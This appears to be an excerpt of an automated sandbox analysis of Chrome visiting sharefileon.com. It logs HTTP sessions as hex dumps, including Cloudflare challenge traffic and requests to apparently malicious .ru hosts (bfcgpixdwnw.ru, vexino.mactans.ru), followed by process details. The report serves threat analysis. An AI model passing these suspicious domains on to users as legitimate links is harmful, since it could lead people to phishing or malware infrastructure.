                                                                                                                                                                                                                          cf-chl-out-s: Jg7i09teYhPvYsyJeeIQpjkzCfmgYJTo9CfADwl8KZFivJq5azU2EG+QfXNNIoWVionGXZdSAhUcQTI1iLXxfCjERxUBfXAArlKk0XALS0fIvnVIResj1G8LIgahlSpweIT4O7gfF9+OJf7lP+dv6K/DnBEwZPjqyTEwxOhr0Mf8endEApWauR+NHFTVP/psY6lw4RQ+v3x1Fgmx8L96gUBty5noP54cKShezDQ0uf1rKPaesmawEAshpqHmQP7/X758Tsd4yLAcGdiJha4G0kH0Sx28WxjPzN31g8MzsCdn0EJDVOWwhrKlo3owPBZeRTUQs4eHwST9sa5f9L9X8V98Hfa5cb4AKQLV2T/V5mFRO/tHMOktAoWZScIAUwkMeAeJNMUnxkjhg6+fMHcQ1MRDFIlKGOhPBoRTBzmNfooQVD8pVu6G0SR1ZOPf2CPGOCEi7NdriP8tzQnRU1WgrgBeryjD4CUGkav8A+ADztz+9B3xrFuHChJw+jiBP47Ozsa9VH/vADpxpq+g+dtbaHxVkA2r9v1hTH6YE/hl3xeOhwfNVkFZqWP74WlET4+oBel6ZoOgLpsU2tWw9+5PkQf30MKMJcCz47ku4e5AOB16VUgFBMmMTtEnVmK1YrXXK0djbgpYDp/YGGwivK4y4fVhmKSmJ7ddJJ1+MiUJXnMch0UROXxEyUvr9SjZduTrTRBqO8BHFCcg6bRAWlP4eONahG8xKl23fTpoyVCZGywkTJdvLCcQLFzL95vW/KJLsjXzQiEBInUqrZvFQPQFHtsP6We2s5F18Is9eOn3VGmktdGLcXUZBkL2RSqLyj0i8PoI5GdGa88TMqIaXXV3261ca8luWtk1VkPwcLMca8YDsXv0/CNcd0quBCnZ5Z9rMEQRovadK2bov6CndpqLPyYFNvoCwIbatqutInB0PkpMNgC3i/oemv2HsROvN8LW0mbjkaq/GgovM/AmfXePQbwLd/nFRlgNs1fFZKGXzmkVu1SUGY [TRUNCATED]
                                                                                                                                                                                                                          2024-12-17 17:21:19 UTC233INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 74 76 37 72 74 74 7a 41 6f 44 79 4c 69 34 79 37 2b 52 61 35 58 50 2f 74 46 53 4b 57 71 55 53 53 42 59 77 6f 64 36 63 76 61 43 4b 76 6b 65 6d 4b 6f 34 2f 45 49 5a 42 35 36 5a 36 52 70 69 30 2b 6f 6d 59 6c 4d 34 39 55 73 33 43 76 63 50 7a 6f 54 4d 6a 73 4a 41 58 76 45 6c 72 46 35 42 7a 6b 47 66 42 4a 6a 49 48 47 75 58 36 5a 50 72 46 70 78 45 50 52 6b 70 55 3d 24 6d 6c 47 66 2b 31 2f 59 65 37 39 38 4d 32 30 42 0d 0a 53 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 43 46 2d 52 41 59 3a 20 38 66 33 38 39 36 62 66 30 65 34 36 34 33 34 35 2d 45 57 52 0d 0a 61 6c 74 2d 73 76 63 3a 20 68 33 3d 22 3a 34 34 33 22 3b 20 6d 61 3d 38 36 34 30 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: cf-chl-out: tv7rttzAoDyLi4y7+Ra5XP/tFSKWqUSSBYwod6cvaCKvkemKo4/EIZB56Z6Rpi0+omYlM49Us3CvcPzoTMjsJAXvElrF5BzkGfBJjIHGuX6ZPrFpxEPRkpU=$mlGf+1/Ye798M20BServer: cloudflareCF-RAY: 8f3896bf0e464345-EWRalt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          2024-12-17 17:21:19 UTC1193INData Raw: 54 32 35 6c 64 49 74 30 6c 6d 35 6d 6a 5a 35 73 63 47 4b 56 6f 34 4a 69 58 35 64 32 68 47 65 43 64 70 36 78 67 58 42 72 69 6f 65 42 73 34 39 32 64 33 4f 39 6a 58 79 79 6c 70 47 42 77 59 4f 58 68 63 57 48 6d 5a 4f 69 6f 4a 69 65 6d 4e 47 68 6b 4c 43 71 70 4b 54 56 79 71 32 6b 32 5a 50 48 6d 37 66 68 73 61 43 77 75 72 65 31 72 37 79 34 74 63 4f 2f 76 61 76 69 78 73 62 42 38 63 6a 67 78 65 57 33 7a 76 72 52 37 39 6a 75 32 4c 2f 57 30 64 6f 44 31 73 2f 66 76 39 54 5a 35 41 37 64 79 39 7a 6d 34 65 4c 62 36 41 50 6c 37 66 54 75 36 52 76 62 39 75 67 65 32 76 48 65 32 2f 72 33 38 51 45 66 2f 76 49 62 4b 77 49 49 47 53 4d 4e 4d 77 6f 53 45 53 67 51 41 51 63 46 45 2f 63 4e 48 66 67 74 4e 52 37 36 4f 2f 34 79 4d 52 49 69 4b 54 77 47 48 69 63 63 4d 69 59 73 50 55 63
                                                                                                                                                                                                                          Data Ascii: T25ldIt0lm5mjZ5scGKVo4JiX5d2hGeCdp6xgXBrioeBs492d3O9jXyylpGBwYOXhcWHmZOioJiemNGhkLCqpKTVyq2k2ZPHm7fhsaCwure1r7y4tcO/vavixsbB8cjgxeW3zvrR79ju2L/W0doD1s/fv9TZ5A7dy9zm4eLb6APl7fTu6Rvb9uge2vHe2/r38QEf/vIbKwIIGSMNMwoSESgQAQcFE/cNHfgtNR76O/4yMRIiKTwGHiccMiYsPUc
                                                                                                                                                                                                                          2024-12-17 17:21:19 UTC1369INData Raw: 75 37 59 47 52 45 50 2b 2f 62 30 44 75 76 71 32 52 58 30 37 74 37 36 38 53 67 41 46 51 63 63 37 76 6a 74 43 67 41 47 42 69 51 6d 44 51 55 53 43 51 72 37 38 44 30 2b 49 50 51 55 4a 67 50 38 51 51 67 5a 4a 45 30 44 4c 45 31 47 48 78 78 52 53 69 4d 67 4c 53 77 33 46 51 30 61 58 69 30 32 55 69 70 42 59 68 38 35 52 42 30 6e 57 45 70 59 57 31 6f 6b 57 32 4d 2b 55 46 42 71 55 30 4e 6c 54 47 64 45 4c 54 52 6d 58 48 78 67 54 6b 42 62 50 6f 51 38 50 54 39 53 61 6d 56 59 57 47 31 2b 52 6f 46 64 66 33 2b 42 5a 58 46 6a 6b 58 71 49 61 58 35 74 6a 46 39 79 61 71 47 4e 6c 32 4f 6b 5a 70 35 79 59 6f 6d 61 61 6e 68 72 69 49 47 51 71 57 64 6f 67 48 4f 6d 6d 58 4f 79 70 34 61 73 73 36 35 34 72 35 53 54 6c 59 2b 47 76 5a 6d 54 68 73 61 4b 7a 70 79 66 73 4d 47 4b 78 37 61 77
                                                                                                                                                                                                                          Data Ascii: u7YGREP+/b0Duvq2RX07t768SgAFQcc7vjtCgAGBiQmDQUSCQr78D0+IPQUJgP8QQgZJE0DLE1GHxxRSiMgLSw3FQ0aXi02UipBYh85RB0nWEpYW1okW2M+UFBqU0NlTGdELTRmXHxgTkBbPoQ8PT9SamVYWG1+RoFdf3+BZXFjkXqIaX5tjF9yaqGNl2OkZp5yYomaanhriIGQqWdogHOmmXOyp4ass654r5STlY+GvZmThsaKzpyfsMGKx7aw
                                                                                                                                                                                                                          2024-12-17 17:21:19 UTC1369INData Raw: 73 68 47 76 34 62 38 50 62 32 35 53 66 31 4a 67 51 41 41 51 63 6b 45 41 73 62 48 7a 44 71 41 41 34 47 45 43 6b 34 42 2f 49 4a 43 78 37 38 44 6b 46 44 46 44 45 32 47 43 67 79 45 7a 31 42 4b 67 74 4b 4b 42 73 62 4b 45 41 68 48 30 34 6c 4a 6a 51 58 4d 6a 63 33 48 7a 45 75 4f 7a 77 78 4d 54 38 34 50 44 56 46 4a 54 68 44 4a 6b 6c 46 53 31 78 6d 55 45 46 44 5a 7a 4a 48 54 32 31 74 57 6a 70 63 57 45 78 4c 58 34 52 57 54 33 31 48 56 47 4f 4b 59 46 6c 6f 6b 59 68 64 57 35 4e 69 67 4a 64 67 6c 49 69 63 69 32 6d 4f 64 59 46 38 6b 61 46 6a 63 47 2b 42 63 48 56 31 68 4b 71 43 67 59 2b 45 62 6f 75 44 70 61 6d 53 62 36 79 4f 6d 6f 65 4e 72 49 5a 78 6d 38 4b 62 72 37 56 2b 6c 62 53 63 74 58 79 6a 75 70 69 4e 7a 63 58 53 6d 72 2f 43 6e 37 54 46 79 71 6d 57 6b 63 32 64 76
                                                                                                                                                                                                                          Data Ascii: shGv4b8Pb25Sf1JgQAAQckEAsbHzDqAA4GECk4B/IJCx78DkFDFDE2GCgyEz1BKgtKKBsbKEAhH04lJjQXMjc3HzEuOzwxMT84PDVFJThDJklFS1xmUEFDZzJHT21tWjpcWExLX4RWT31HVGOKYFlokYhdW5NigJdglIici2mOdYF8kaFjcG+BcHV1hKqCgY+EbouDpamSb6yOmoeNrIZxm8Kbr7V+lbSctXyjupiNzcXSmr/Cn7TFyqmWkc2dv
                                                                                                                                                                                                                          2024-12-17 17:21:19 UTC613INData Raw: 62 37 69 4d 59 35 75 50 7a 47 75 73 63 2b 77 38 42 43 6a 58 79 38 76 34 7a 4b 50 6a 73 2b 67 67 4e 50 54 34 61 2f 54 45 33 45 68 42 46 4a 30 55 59 53 78 6b 37 47 45 77 35 51 7a 49 63 44 67 73 6a 56 42 4e 42 4b 53 4e 4f 4d 79 34 34 4c 46 41 65 54 31 31 6b 49 6c 73 31 53 53 6c 59 51 32 68 4e 61 32 56 72 55 47 46 55 5a 44 4a 50 5a 32 68 43 4c 55 38 39 53 58 32 42 51 45 6f 31 58 30 56 43 58 31 56 30 53 47 52 49 66 46 6c 6e 61 58 46 66 6a 33 46 69 55 30 31 73 59 58 70 79 6a 6e 35 64 56 56 74 73 58 70 2b 41 6a 6f 57 6e 64 36 47 4b 67 34 57 59 6a 49 65 4c 72 58 47 66 6f 6f 70 2b 6f 35 43 6a 64 62 69 75 68 6f 32 2b 75 34 75 53 6e 4c 61 56 68 63 61 36 6d 70 71 33 7a 59 61 64 77 35 75 4b 6a 73 2b 50 71 5a 53 75 70 38 6d 4d 6b 64 6d 61 6e 62 75 78 79 71 33 68 6e 37
                                                                                                                                                                                                                          Data Ascii: b7iMY5uPzGusc+w8BCjXy8v4zKPjs+ggNPT4a/TE3EhBFJ0UYSxk7GEw5QzIcDgsjVBNBKSNOMy44LFAeT11kIls1SSlYQ2hNa2VrUGFUZDJPZ2hCLU89SX2BQEo1X0VCX1V0SGRIfFlnaXFfj3FiU01sYXpyjn5dVVtsXp+AjoWnd6GKg4WYjIeLrXGfoop+o5Cjdbiuho2+u4uSnLaVhca6mpq3zYadw5uKjs+PqZSup8mMkdmanbuxyq3hn7


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          29192.168.2.1849813104.18.95.41443676C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-12-17 17:21:20 UTC597OUTGET /cdn-cgi/challenge-platform/h/b/flow/ov1/23085707:1734452156:WblsTdAJEcjJkQ6MdfC5aVXpjbsW6KLUWCunspYRaNE/8f38965da8164322/UMT0HZxCYLKOn6xxD1kYBQ6BtLlFKddTwtjvgoUpoyY-1734456063-1.1.1.1-JZJ6q_Y40HD2E7Y6Xr.GxTkNZKxni2VN_gZ9lI79T8H_8oHo1ckqnNOVOYfvaV9j HTTP/1.1
                                                                                                                                                                                                                          Host: challenges.cloudflare.com
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                          2024-12-17 17:21:21 UTC379INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                          Date: Tue, 17 Dec 2024 17:21:21 GMT
                                                                                                                                                                                                                          Content-Type: application/json
                                                                                                                                                                                                                          Content-Length: 7
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          cf-chl-out: THv3vofDioSIlwD1jXaRl3C0bhTX4MVrkxk=$UHhag6/aaUWWbcQt
                                                                                                                                                                                                                          cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8f3896cbee09de94-EWR
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          2024-12-17 17:21:21 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                                                                                                                          Data Ascii: invalid


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          30192.168.2.1849815104.21.65.72443676C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-12-17 17:21:22 UTC666OUTGET /qHLFRJZPdOTGGnAgLpZPzySPmqdHWHETPVTWEAMVQJLRSPMAYJAEZKMUSKUMPCY HTTP/1.1
                                                                                                                                                                                                                          Host: weuutkdxx65sbffqe71rl8qvlydf19t1muxwamupghhtsvpbyzhhl6du.bfcgpixdwnw.ru
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Origin: https://vexino.mactans.ru
                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                          Referer: https://vexino.mactans.ru/
                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                          2024-12-17 17:21:23 UTC912INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Tue, 17 Dec 2024 17:21:23 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jM7jTTuot98HPAN1l64iWUtO46fWsdDrM%2FCz%2B1zjFoXdiqLmcJH%2FJ36drVbcnMR8%2FozYdg5t9Uf%2FRHdpea7X3WiIvvSZVeXLQyL3Kq9CtgC87%2BTgMs32WMecjr%2BBmoO%2BfPed1dUT6aQJjRafbrIa%2F3yjqQYA6HSuj9FMX3OukJO3eQERm99H0lLOuUG4%2Bv5ehuVBPN4pqfKWWg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8f3896d5e8d8c32c-EWR
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1686&min_rtt=1678&rtt_var=646&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2837&recv_bytes=1244&delivery_rate=1670480&cwnd=171&unsent_bytes=0&cid=fc5f9f2908c8413e&ts=954&x=0"
                                                                                                                                                                                                                          2024-12-17 17:21:23 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                                                                                          Data Ascii: 11
                                                                                                                                                                                                                          2024-12-17 17:21:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                          31192.168.2.1849820104.21.65.72443676C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                          2024-12-17 17:21:26 UTC458OUTGET /qHLFRJZPdOTGGnAgLpZPzySPmqdHWHETPVTWEAMVQJLRSPMAYJAEZKMUSKUMPCY HTTP/1.1
                                                                                                                                                                                                                          Host: weuutkdxx65sbffqe71rl8qvlydf19t1muxwamupghhtsvpbyzhhl6du.bfcgpixdwnw.ru
                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                          2024-12-17 17:21:27 UTC900INHTTP/1.1 200 OK
                                                                                                                                                                                                                          Date: Tue, 17 Dec 2024 17:21:26 GMT
                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                          Access-Control-Allow-Origin: *
                                                                                                                                                                                                                          cf-cache-status: DYNAMIC
                                                                                                                                                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ZDkXTbuFScSjkt9w0UmooR4BXtEYNsf5FHAHgc8UkJ09aaj6emqxjcihGIclV2lZVJ3SP%2BmobicfNoYDddPrIAJWEPwyv%2FP1T1aYRcKEK3h3K6ta0CZdvu%2BDg%2FOZYs4tSszj6q8lTyIdoav5dcvvk7wSf1cEKUGBiqFOFLSyEhli02H6RbWCotTX2HVwWDboeE5s3hLU3q9Q2w%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                          Server: cloudflare
                                                                                                                                                                                                                          CF-RAY: 8f3896ec2b1dde98-EWR
                                                                                                                                                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1587&min_rtt=1586&rtt_var=597&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2836&recv_bytes=1036&delivery_rate=1828428&cwnd=212&unsent_bytes=0&cid=bae4c4055c866a7c&ts=914&x=0"
                                                                                                                                                                                                                          2024-12-17 17:21:27 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                                                                                                                                                                                          Data Ascii: 11
                                                                                                                                                                                                                          2024-12-17 17:21:27 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                          Data Ascii: 0


                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                          Click to jump to process

                                                                                                                                                                                                                          Target ID:0
                                                                                                                                                                                                                          Start time:12:20:34
                                                                                                                                                                                                                          Start date:17/12/2024
                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
                                                                                                                                                                                                                          Imagebase:0x7ff728d30000
                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                          MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                          Target ID:1
                                                                                                                                                                                                                          Start time:12:20:34
                                                                                                                                                                                                                          Start date:17/12/2024
                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1984,i,5179110218857674790,7664431697480390982,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                                                                                                                                                                          Imagebase:0x7ff728d30000
                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                          MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Has exited:false

                                                                                                                                                                                                                          Target ID:2
                                                                                                                                                                                                                          Start time:12:20:35
                                                                                                                                                                                                                          Start date:17/12/2024
                                                                                                                                                                                                                          Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                                                                                          Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" "http://sharefileon.com"
                                                                                                                                                                                                                          Imagebase:0x7ff728d30000
                                                                                                                                                                                                                          File size:3'242'272 bytes
                                                                                                                                                                                                                          MD5 hash:83395EAB5B03DEA9720F8D7AC0D15CAA
                                                                                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                                                                                          Reputation:low
                                                                                                                                                                                                                          Has exited:true

                                                                                                                                                                                                                          No disassembly